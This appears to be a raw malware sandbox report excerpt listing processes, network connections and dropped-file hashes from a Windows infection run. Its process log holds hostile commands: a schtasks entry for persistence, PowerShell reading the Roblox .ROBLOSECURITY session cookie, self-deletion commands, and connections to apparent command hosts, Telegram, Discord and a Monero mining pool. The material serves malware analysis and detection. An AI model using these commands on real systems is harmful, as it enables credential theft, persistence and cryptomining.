C:\Windows\SysWOW64\WerFault.exe -pss -s 572 -p 7044 -ip 7044
C:\Users\Admin\AppData\Local\Temp\a\mfcthased.exe
"C:\Users\Admin\AppData\Local\Temp\a\mfcthased.exe"
C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "xda" /tr "C:\Users\Admin\AppData\Roaming\System32\xda.dll"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 7044 -s 80
C:\Users\Admin\AppData\Local\Temp\a\kisloyat.exe
"C:\Users\Admin\AppData\Local\Temp\a\kisloyat.exe"
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 608 -p 1916 -ip 1916
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 1916 -s 944
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Users\Admin\AppData\Local\Temp\10000550101\puttyw.exe
"C:\Users\Admin\AppData\Local\Temp\10000550101\puttyw.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" os get Caption
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 608 -p 1516 -ip 1516
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 672 -p 5172 -ip 5172
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 640 -p 1764 -ip 1764
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 732 -p 7148 -ip 7148
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 700 -p 6952 -ip 6952
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 1516 -s 1092
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 1764 -s 2372
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5172 -s 876
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" computersystem get totalphysicalmemory
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" csproduct get uuid
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
C:\Windows\System32\Wbem\wmic.exe
"wmic" path win32_VideoController get name
C:\Windows\SYSTEM32\cmd.exe
"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\a\Winlogoh.exe" && pause
C:\Windows\system32\PING.EXE
ping localhost
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" -NoProfile -NonInteractive -NoLogo -Command "[Console]::OutputEncoding = [System.Text.Encoding]::UTF8; Get-Culture | Select -ExpandProperty DisplayName"
C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
C:\Windows\explorer.exe
explorer.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell ping 127.1.10.1; del Intel_PTT_EK_Recertification.exe
C:\Windows\system32\PING.EXE
"C:\Windows\system32\PING.EXE" 127.1.10.1
C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe
C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe
C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe
C:\Windows\explorer.exe
explorer.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell ping 127.1.0.1; del MicrosoftEdgeUpdateTaskMachineCoreSC.exe
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 592 -p 4444 -ip 4444
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 624 -p 5096 -ip 5096
C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe
"C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 644 -p 3776 -ip 3776
C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe
C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe
C:\Windows\explorer.exe
explorer.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell ping 127.1.0.1; del MicrosoftEdgeUpdateTaskMachineCoreSC.exe
C:\Windows\system32\PING.EXE
"C:\Windows\system32\PING.EXE" 127.1.0.1
C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe
C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
C:\Windows\explorer.exe
explorer.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell ping 127.1.10.1; del Intel_PTT_EK_Recertification.exe
C:\Windows\system32\PING.EXE
"C:\Windows\system32\PING.EXE" 127.1.10.1
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 720 -p 4756 -ip 4756
C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe
"C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 384 -p 6100 -ip 6100
C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe
C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe
C:\Windows\explorer.exe
explorer.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell ping 127.1.0.1; del MicrosoftEdgeUpdateTaskMachineCoreSC.exe
C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe
C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
C:\Windows\explorer.exe
explorer.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell ping 127.1.10.1; del Intel_PTT_EK_Recertification.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 608 -p 4456 -ip 4456
C:\Windows\system32\PING.EXE
"C:\Windows\system32\PING.EXE" 127.1.0.1
C:\Windows\system32\PING.EXE
"C:\Windows\system32\PING.EXE" 127.1.10.1
C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe
"C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | urlhaus.abuse.ch | udp |
| US | 151.101.130.49:443 | urlhaus.abuse.ch | tcp |
| US | 8.8.8.8:53 | 13.86.106.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 134.130.81.91.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 49.130.101.151.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 4.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 232.168.11.51.in-addr.arpa | udp |
| RU | 31.41.244.11:80 | 31.41.244.11 | tcp |
| US | 8.8.8.8:53 | 11.244.41.31.in-addr.arpa | udp |
| US | 8.8.8.8:53 | raw.githubusercontent.com | udp |
| US | 185.199.109.133:443 | raw.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 133.109.199.185.in-addr.arpa | udp |
| RU | 185.215.113.209:80 | 185.215.113.209 | tcp |
| US | 8.8.8.8:53 | gateway.discord.gg | udp |
| US | 162.159.130.234:443 | gateway.discord.gg | tcp |
| US | 8.8.8.8:53 | 209.113.215.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 234.130.159.162.in-addr.arpa | udp |
| US | 8.8.8.8:53 | discord.com | udp |
| US | 162.159.135.232:443 | discord.com | tcp |
| US | 8.8.8.8:53 | geolocation-db.com | udp |
| DE | 159.89.102.253:443 | geolocation-db.com | tcp |
| US | 8.8.8.8:53 | 232.135.159.162.in-addr.arpa | udp |
| US | 162.159.135.232:443 | discord.com | tcp |
| US | 8.8.8.8:53 | 253.102.89.159.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 50.23.12.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| FR | 194.59.30.220:1336 | tcp | |
| US | 8.8.8.8:53 | 220.30.59.194.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 67.31.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 69.72.21.2.in-addr.arpa | udp |
| RU | 31.41.244.10:80 | 31.41.244.10 | tcp |
| US | 8.8.8.8:53 | 10.244.41.31.in-addr.arpa | udp |
| RU | 31.41.244.12:80 | 31.41.244.12 | tcp |
| US | 8.8.8.8:53 | 12.244.41.31.in-addr.arpa | udp |
| US | 8.8.8.8:53 | drive.google.com | udp |
| FR | 142.250.75.238:443 | drive.google.com | tcp |
| US | 8.8.8.8:53 | 238.75.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | c.pki.goog | udp |
| FR | 142.250.179.67:80 | c.pki.goog | tcp |
| US | 8.8.8.8:53 | 67.179.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | o.pki.goog | udp |
| FR | 142.250.179.67:80 | o.pki.goog | tcp |
| US | 8.8.8.8:53 | drive.usercontent.google.com | udp |
| FR | 142.250.74.225:443 | drive.usercontent.google.com | tcp |
| US | 8.8.8.8:53 | 225.74.250.142.in-addr.arpa | udp |
| RU | 31.41.244.9:80 | 31.41.244.9 | tcp |
| US | 8.8.8.8:53 | ipinfo.io | udp |
| US | 34.117.59.81:443 | ipinfo.io | tcp |
| US | 8.8.8.8:53 | 9.244.41.31.in-addr.arpa | udp |
| RU | 185.215.113.16:80 | 185.215.113.16 | tcp |
| US | 8.8.8.8:53 | 16.113.215.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 81.59.117.34.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 96.33.115.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | r11.o.lencr.org | udp |
| GB | 88.221.134.137:80 | r11.o.lencr.org | tcp |
| US | 8.8.8.8:53 | 137.134.221.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | t.me | udp |
| NL | 149.154.167.99:443 | t.me | tcp |
| US | 8.8.8.8:53 | api.telegram.org | udp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| US | 8.8.8.8:53 | 99.167.154.149.in-addr.arpa | udp |
| US | 8.8.8.8:53 | grahm.xyz | udp |
| DE | 116.203.10.31:443 | grahm.xyz | tcp |
| US | 8.8.8.8:53 | 220.167.154.149.in-addr.arpa | udp |
| US | 66.45.226.53:7777 | 66.45.226.53 | tcp |
| DE | 116.203.10.31:443 | grahm.xyz | tcp |
| RU | 83.217.206.25:2000 | tcp | |
| RU | 89.169.0.48:80 | tcp | |
| RU | 89.169.0.123:8291 | tcp | |
| RU | 89.169.41.152:8291 | tcp | |
| RU | 83.217.206.4:1723 | tcp | |
| RU | 83.217.197.147:80 | tcp | |
| RU | 83.217.197.147:22 | tcp | |
| RU | 178.215.74.33:23 | tcp | |
| RU | 83.217.206.234:1025 | tcp | |
| RU | 89.169.1.195:443 | tcp | |
| RU | 89.169.0.159:80 | tcp | |
| RU | 83.217.219.202:8291 | tcp | |
| RU | 89.169.41.36:80 | tcp | |
| RU | 213.108.19.2:80 | tcp | |
| US | 8.8.8.8:53 | 36.249.124.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 31.10.203.116.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 53.226.45.66.in-addr.arpa | udp |
| DE | 116.203.10.31:443 | grahm.xyz | tcp |
| US | 8.8.8.8:53 | 147.197.217.83.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 4.206.217.83.in-addr.arpa | udp |
| RU | 89.169.42.90:10001 | tcp | |
| RU | 89.169.0.58:21 | tcp | |
| RU | 83.217.206.105:8888 | tcp | |
| RU | 89.169.3.243:81 | tcp | |
| RU | 83.217.205.178:21 | tcp | |
| US | 8.8.8.8:53 | e5.o.lencr.org | udp |
| US | 2.21.244.142:80 | e5.o.lencr.org | tcp |
| US | 8.8.8.8:53 | 25.206.217.83.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 142.244.21.2.in-addr.arpa | udp |
| DE | 116.203.10.31:443 | grahm.xyz | tcp |
| DE | 116.203.10.31:443 | grahm.xyz | tcp |
| DE | 116.203.10.31:443 | grahm.xyz | tcp |
| DE | 116.203.10.31:443 | grahm.xyz | tcp |
| DE | 116.203.10.31:443 | grahm.xyz | tcp |
| US | 8.8.8.8:53 | ikswccmqsqeswegi.xyz | udp |
| US | 185.200.191.124:443 | aukuqiksseyscgie.xyz | tcp |
| US | 185.199.109.133:443 | raw.githubusercontent.com | tcp |
| US | 185.200.191.124:443 | aukuqiksseyscgie.xyz | tcp |
| US | 8.8.8.8:53 | infect-crackle.cyou | udp |
| US | 172.67.216.167:443 | infect-crackle.cyou | tcp |
| US | 8.8.8.8:53 | 124.191.200.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | se-blurry.biz | udp |
| US | 8.8.8.8:53 | zinc-sneark.biz | udp |
| US | 8.8.8.8:53 | dwell-exclaim.biz | udp |
| US | 8.8.8.8:53 | formy-spill.biz | udp |
| US | 8.8.8.8:53 | covery-mover.biz | udp |
| US | 8.8.8.8:53 | google.com | udp |
| US | 104.21.58.186:443 | covery-mover.biz | tcp |
| US | 8.8.8.8:53 | peerhost59mj7i6macla65r.com | udp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| NL | 94.154.172.218:443 | peerhost59mj7i6macla65r.com | tcp |
| US | 8.8.8.8:53 | 167.216.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 186.58.21.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 1.112.95.208.in-addr.arpa | udp |
| US | 8.8.8.8:53 | dare-curbys.biz | udp |
| US | 8.8.8.8:53 | print-vexer.biz | udp |
| US | 8.8.8.8:53 | impend-differ.biz | udp |
| US | 8.8.8.8:53 | steamcommunity.com | udp |
| GB | 2.22.99.85:443 | steamcommunity.com | tcp |
| NL | 94.154.172.218:443 | peerhost59mj7i6macla65r.com | tcp |
| N/A | 224.0.0.251:5353 | udp | |
| US | 8.8.8.8:53 | 218.172.154.94.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 85.99.22.2.in-addr.arpa | udp |
| NL | 94.154.172.218:443 | peerhost59mj7i6macla65r.com | tcp |
| NL | 94.154.172.218:443 | peerhost59mj7i6macla65r.com | tcp |
| FR | 142.250.75.238:443 | drive.google.com | tcp |
| FR | 142.250.74.225:443 | drive.usercontent.google.com | tcp |
| US | 8.8.8.8:53 | fightlsoser.click | udp |
| US | 104.21.35.43:443 | fightlsoser.click | tcp |
| US | 8.8.8.8:53 | 43.35.21.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | ikswccmqsqeswegi.xyz | udp |
| US | 185.200.191.124:443 | aukuqiksseyscgie.xyz | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| US | 104.21.58.186:443 | covery-mover.biz | tcp |
| US | 185.200.191.124:443 | aukuqiksseyscgie.xyz | tcp |
| GB | 2.22.99.85:443 | steamcommunity.com | tcp |
| US | 185.200.191.124:443 | aukuqiksseyscgie.xyz | tcp |
| US | 8.8.8.8:53 | ipinfo.io | udp |
| US | 34.117.59.81:443 | ipinfo.io | tcp |
| US | 8.8.8.8:53 | api.telegram.org | udp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| US | 8.8.8.8:53 | drive-connect.cyou | udp |
| US | 104.21.79.7:443 | drive-connect.cyou | tcp |
| US | 8.8.8.8:53 | se-blurry.biz | udp |
| US | 8.8.8.8:53 | zinc-sneark.biz | udp |
| US | 8.8.8.8:53 | dwell-exclaim.biz | udp |
| US | 8.8.8.8:53 | formy-spill.biz | udp |
| US | 104.21.58.186:443 | covery-mover.biz | tcp |
| US | 8.8.8.8:53 | 7.79.21.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | dare-curbys.biz | udp |
| US | 8.8.8.8:53 | print-vexer.biz | udp |
| NL | 149.154.167.99:443 | t.me | tcp |
| US | 8.8.8.8:53 | impend-differ.biz | udp |
| GB | 2.22.99.85:443 | steamcommunity.com | tcp |
| DE | 116.203.10.31:443 | grahm.xyz | tcp |
| DE | 116.203.10.31:443 | grahm.xyz | tcp |
| DE | 116.203.10.31:443 | grahm.xyz | tcp |
| US | 185.200.191.124:443 | aukuqiksseyscgie.xyz | tcp |
| DE | 116.203.10.31:443 | grahm.xyz | tcp |
| US | 185.200.191.124:443 | aukuqiksseyscgie.xyz | tcp |
| US | 185.200.191.124:443 | aukuqiksseyscgie.xyz | tcp |
| DE | 116.203.10.31:443 | grahm.xyz | tcp |
| US | 185.200.191.124:443 | aukuqiksseyscgie.xyz | tcp |
| DE | 116.203.10.31:443 | grahm.xyz | tcp |
| US | 185.200.191.124:443 | aukuqiksseyscgie.xyz | tcp |
| DE | 116.203.10.31:443 | grahm.xyz | tcp |
| US | 8.8.8.8:53 | a1060630.xsph.ru | udp |
| DE | 116.203.10.31:443 | grahm.xyz | tcp |
| RU | 141.8.192.138:80 | a1060630.xsph.ru | tcp |
| US | 8.8.8.8:53 | 138.192.8.141.in-addr.arpa | udp |
| FR | 142.250.75.238:443 | drive.google.com | tcp |
| FR | 142.250.74.225:443 | drive.usercontent.google.com | tcp |
| US | 8.8.8.8:53 | f0706909.xsph.ru | udp |
| RU | 141.8.193.236:80 | f0706909.xsph.ru | tcp |
| US | 8.8.8.8:53 | ipwho.is | udp |
| DE | 195.201.57.90:80 | ipwho.is | tcp |
| US | 8.8.8.8:53 | 236.193.8.141.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 90.57.201.195.in-addr.arpa | udp |
| US | 34.117.59.81:443 | ipinfo.io | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| DE | 101.99.92.189:8080 | tcp | |
| US | 8.8.8.8:53 | 189.92.99.101.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 29.243.111.52.in-addr.arpa | udp |
| US | 147.135.6.69:443 | tcp | |
| N/A | 127.0.0.1:57041 | tcp | |
| N/A | 127.0.0.1:57138 | tcp | |
| US | 8.8.8.8:53 | 69.6.135.147.in-addr.arpa | udp |
| PL | 95.214.53.96:8443 | tcp | |
| DE | 103.252.90.236:9200 | tcp | |
| US | 8.8.8.8:53 | 236.90.252.103.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 96.53.214.95.in-addr.arpa | udp |
| US | 185.200.191.124:443 | aukuqiksseyscgie.xyz | tcp |
| US | 8.8.8.8:53 | a1059592.xsph.ru | udp |
| RU | 141.8.192.138:80 | a1059592.xsph.ru | tcp |
| US | 8.8.8.8:53 | f1043947.xsph.ru | udp |
| RU | 141.8.192.151:80 | f1043947.xsph.ru | tcp |
| US | 8.8.8.8:53 | 151.192.8.141.in-addr.arpa | udp |
| US | 8.8.8.8:53 | sanboxland.pro | udp |
| GB | 89.35.131.209:80 | sanboxland.pro | tcp |
| US | 8.8.8.8:53 | a1051707.xsph.ru | udp |
| RU | 141.8.192.217:80 | a1051707.xsph.ru | tcp |
| US | 8.8.8.8:53 | 209.131.35.89.in-addr.arpa | udp |
| US | 8.8.8.8:53 | github.com | udp |
| US | 8.8.8.8:53 | gstatic.com | udp |
| GB | 20.26.156.215:80 | github.com | tcp |
| GB | 20.26.156.215:443 | github.com | tcp |
| FR | 142.250.75.227:443 | gstatic.com | tcp |
| US | 8.8.8.8:53 | 217.192.8.141.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 227.75.250.142.in-addr.arpa | udp |
| US | 185.199.109.133:443 | raw.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | freegeoip.app | udp |
| NL | 45.155.249.199:80 | 45.155.249.199 | tcp |
| US | 154.216.17.90:80 | tcp | |
| US | 8.8.8.8:53 | wodresomdaymomentum.org | udp |
| NL | 78.41.139.3:4000 | wodresomdaymomentum.org | tcp |
| NL | 78.41.139.3:5152 | wodresomdaymomentum.org | tcp |
| US | 8.8.8.8:53 | 199.249.155.45.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 3.139.41.78.in-addr.arpa | udp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | discord.com | udp |
| US | 162.159.137.232:443 | discord.com | tcp |
| US | 8.8.8.8:53 | aukuqiksseyscgie.xyz | udp |
| US | 185.200.191.124:443 | aukuqiksseyscgie.xyz | tcp |
| US | 8.8.8.8:53 | ipwho.is | udp |
| DE | 195.201.57.90:80 | ipwho.is | tcp |
| US | 8.8.8.8:53 | 232.137.159.162.in-addr.arpa | udp |
| US | 8.8.8.8:53 | api.telegram.org | udp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| US | 185.200.191.124:443 | aukuqiksseyscgie.xyz | tcp |
| US | 154.216.17.90:80 | tcp | |
| US | 185.200.191.124:443 | aukuqiksseyscgie.xyz | tcp |
| US | 154.216.17.90:80 | tcp | |
| US | 185.200.191.124:443 | aukuqiksseyscgie.xyz | tcp |
| US | 8.8.8.8:53 | xmr-eu2.nanopool.org | udp |
| PL | 51.68.137.186:10343 | xmr-eu2.nanopool.org | tcp |
| US | 8.8.8.8:53 | 186.137.68.51.in-addr.arpa | udp |
| US | 154.216.17.90:80 | tcp | |
| US | 154.216.17.90:80 | tcp | |
| US | 154.216.17.90:80 | tcp |
Files
memory/1764-0-0x00007FFB5C283000-0x00007FFB5C285000-memory.dmp
memory/1764-1-0x0000000000A10000-0x0000000000A18000-memory.dmp
memory/1764-2-0x00007FFB5C280000-0x00007FFB5CD41000-memory.dmp
memory/1764-3-0x00007FFB5C283000-0x00007FFB5C285000-memory.dmp
memory/1764-4-0x00007FFB5C280000-0x00007FFB5CD41000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\a\random.exe
| MD5 | 3a425626cbd40345f5b8dddd6b2b9efa |
| SHA1 | 7b50e108e293e54c15dce816552356f424eea97a |
| SHA256 | ba9212d2d5cd6df5eb7933fb37c1b72a648974c1730bf5c32439987558f8e8b1 |
| SHA512 | a7538c6b7e17c35f053721308b8d6dc53a90e79930ff4ed5cffecaa97f4d0fbc5f9e8b59f1383d8f0699c8d4f1331f226af71d40325022d10b885606a72fe668 |
C:\Users\Admin\AppData\Local\Temp\a\u1w30Wt.exe
| MD5 | e3eb0a1df437f3f97a64aca5952c8ea0 |
| SHA1 | 7dd71afcfb14e105e80b0c0d7fce370a28a41f0a |
| SHA256 | 38ffd4972ae513a0c79a8be4573403edcd709f0f572105362b08ff50cf6de521 |
| SHA512 | 43573b0cbaac6e2e1646e6217d2d10c40ad10b9db1f4492d6740545e793c891b5e39283a082896c0392b88eb319dfa9392421b1c89c094c9ce9f31b53d37ebaf |
C:\Users\Admin\AppData\Local\Temp\a\client.exe
| MD5 | 52a3c7712a84a0f17e9602828bf2e86d |
| SHA1 | 15fca5f393bc320b6c4d22580fe7d2f3a1970ac2 |
| SHA256 | afa87c0232de627e818d62578bde4809d8d91a3021bc4b5bdb678767844e2288 |
| SHA512 | 892e084cfe823d820b00381625edda702a561be82c24a3e2701a1b2a397d4fc49e45ca80ac93a60d46efc83b224a6dc7ea1ea85f74ee8a27220a666b3f7ebfac |
memory/1172-37-0x000001FB73A70000-0x000001FB73C32000-memory.dmp
memory/1172-38-0x00007FFB5C280000-0x00007FFB5CD41000-memory.dmp
memory/1172-36-0x000001FB713A0000-0x000001FB713B8000-memory.dmp
memory/1172-39-0x000001FB74350000-0x000001FB74878000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\main\main.bat
| MD5 | 3626532127e3066df98e34c3d56a1869 |
| SHA1 | 5fa7102f02615afde4efd4ed091744e842c63f78 |
| SHA256 | 2a0e18ef585db0802269b8c1ddccb95ce4c0bac747e207ee6131dee989788bca |
| SHA512 | dcce66d6e24d5a4a352874144871cd73c327e04c1b50764399457d8d70a9515f5bc0a650232763bf34d4830bab70ee4539646e7625cfe5336a870e311043b2bd |
C:\Users\Admin\AppData\Local\Temp\main\file.bin
| MD5 | 045b0a3d5be6f10ddf19ae6d92dfdd70 |
| SHA1 | 0387715b6681d7097d372cd0005b664f76c933c7 |
| SHA256 | 94b392e94fa47d1b9b7ae6a29527727268cc2e3484e818c23608f8835bc1104d |
| SHA512 | 58255a755531791b888ffd9b663cc678c63d5caa932260e9546b1b10a8d54208334725c14529116b067bcf5a5e02da85e015a3bed80092b7698a43dab0168c7b |
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
| MD5 | 619f7135621b50fd1900ff24aade1524 |
| SHA1 | 6c7ea8bbd435163ae3945cbef30ef6b9872a4591 |
| SHA256 | 344f076bb1211cb02eca9e5ed2c0ce59bcf74ccbc749ec611538fa14ecb9aad2 |
| SHA512 | 2c7293c084d09bc2e3ae2d066dd7b331c810d9e2eeca8b236a8e87fdeb18e877b948747d3491fcaff245816507685250bd35f984c67a43b29b0ae31ecb2bd628 |
C:\Users\Admin\AppData\Local\Temp\main\7z.dll
| MD5 | 72491c7b87a7c2dd350b727444f13bb4 |
| SHA1 | 1e9338d56db7ded386878eab7bb44b8934ab1bc7 |
| SHA256 | 34ad9bb80fe8bf28171e671228eb5b64a55caa388c31cb8c0df77c0136735891 |
| SHA512 | 583d0859d29145dfc48287c5a1b459e5db4e939624bd549ff02c61eae8a0f31fc96a509f3e146200cdd4c93b154123e5adfbfe01f7d172db33968155189b5511 |
C:\Users\Admin\AppData\Local\Temp\main\extracted\file_7.zip
| MD5 | cea368fc334a9aec1ecff4b15612e5b0 |
| SHA1 | 493d23f72731bb570d904014ffdacbba2334ce26 |
| SHA256 | 07e38cad68b0cdbea62f55f9bc6ee80545c2e1a39983baa222e8af788f028541 |
| SHA512 | bed35a1cc56f32e0109ea5a02578489682a990b5cefa58d7cf778815254af9849e731031e824adba07c86c8425df58a1967ac84ce004c62e316a2e51a75c8748 |
C:\Users\Admin\AppData\Local\Temp\main\extracted\file_6.zip
| MD5 | 0dc4014facf82aa027904c1be1d403c1 |
| SHA1 | 5e6d6c020bfc2e6f24f3d237946b0103fe9b1831 |
| SHA256 | a29ddd29958c64e0af1a848409e97401307277bb6f11777b1cfb0404a6226de7 |
| SHA512 | cbeead189918657cc81e844ed9673ee8f743aed29ad9948e90afdfbecacc9c764fbdbfb92e8c8ceb5ae47cee52e833e386a304db0572c7130d1a54fd9c2cc028 |
C:\Users\Admin\AppData\Local\Temp\main\extracted\file_5.zip
| MD5 | b7d1e04629bec112923446fda5391731 |
| SHA1 | 814055286f963ddaa5bf3019821cb8a565b56cb8 |
| SHA256 | 4da77d4ee30ad0cd56cd620f4e9dc4016244ace015c5b4b43f8f37dd8e3a8789 |
| SHA512 | 79fc3606b0fe6a1e31a2ecacc96623caf236bf2be692dadab6ea8ffa4af4231d782094a63b76631068364ac9b6a872b02f1e080636eba40ed019c2949a8e28db |
C:\Users\Admin\AppData\Local\Temp\main\extracted\file_4.zip
| MD5 | 7187cc2643affab4ca29d92251c96dee |
| SHA1 | ab0a4de90a14551834e12bb2c8c6b9ee517acaf4 |
| SHA256 | c7e92a1af295307fb92ad534e05fba879a7cf6716f93aefca0ebfcb8cee7a830 |
| SHA512 | 27985d317a5c844871ffb2527d04aa50ef7442b2f00d69d5ab6bbb85cd7be1d7057ffd3151d0896f05603677c2f7361ed021eac921e012d74da049ef6949e3a3 |
C:\Users\Admin\AppData\Local\Temp\main\extracted\file_3.zip
| MD5 | 5eb39ba3698c99891a6b6eb036cfb653 |
| SHA1 | d2f1cdd59669f006a2f1aa9214aeed48bc88c06e |
| SHA256 | e77f5e03ae140dda27d73e1ffe43f7911e006a108cf51cbd0e05d73aa92da7c2 |
| SHA512 | 6c4ca20e88d49256ed9cabec0d1f2b00dfcf3d1603b5c95d158d4438c9f1e58495f8dfa200dbe7f49b5b0dd57886517eb3b98c4190484548720dad4b3db6069e |
C:\Users\Admin\AppData\Local\Temp\main\extracted\file_2.zip
